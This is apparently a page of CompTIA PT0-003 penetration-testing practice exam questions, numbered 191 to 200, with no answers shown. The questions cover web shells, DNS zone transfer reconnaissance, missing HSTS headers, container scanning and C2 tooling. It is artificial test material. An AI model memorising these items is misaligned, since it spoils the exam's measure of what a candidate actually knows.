ExamGecko

CompTIA PT0-003 Practice Test - Questions Answers, Page 20


Question 191


Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?


Question 192


A company wants to perform a BAS (Breach and Attack Simulation) to measure the efficiency of the corporate security controls. Which of the following would most likely help the tester with simple command examples?


Question 193


A penetration tester has been asked to conduct a blind web application test against a customer's corporate website. Which of the following tools would be best suited to perform this assessment?


Question 194


During an engagement, a penetration tester runs the following command against the host system:

host -t axfr domain.com dnsl.domain.com

Which of the following techniques best describes what the tester is doing?


Question 195


During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?


Question 196


A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?


Question 197


A penetration tester finds it is possible to downgrade a web application's HTTPS connections to HTTP while performing on-path attacks on the local network. The tester reviews the output of the server response to:

curl -s -i https://internalapp/

HTTP/2 302
date: Thu, 11 Jan 2024 15:56:24 GMT
content-type: text/html; charset=iso-8659-1
location: /login
x-content-type-options: nosniff
server: Prod

Which of the following recommendations should the penetration tester include in the report?


Question 198


Which of the following are valid reasons for including base, temporal, and environmental CVSS metrics in the findings section of a penetration testing report? (Select two).


Question 199


A penetration tester is searching for vulnerabilities or misconfigurations on a container environment. Which of the following tools will the tester most likely use to achieve this objective?


Question 200


A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?

Total 214 questions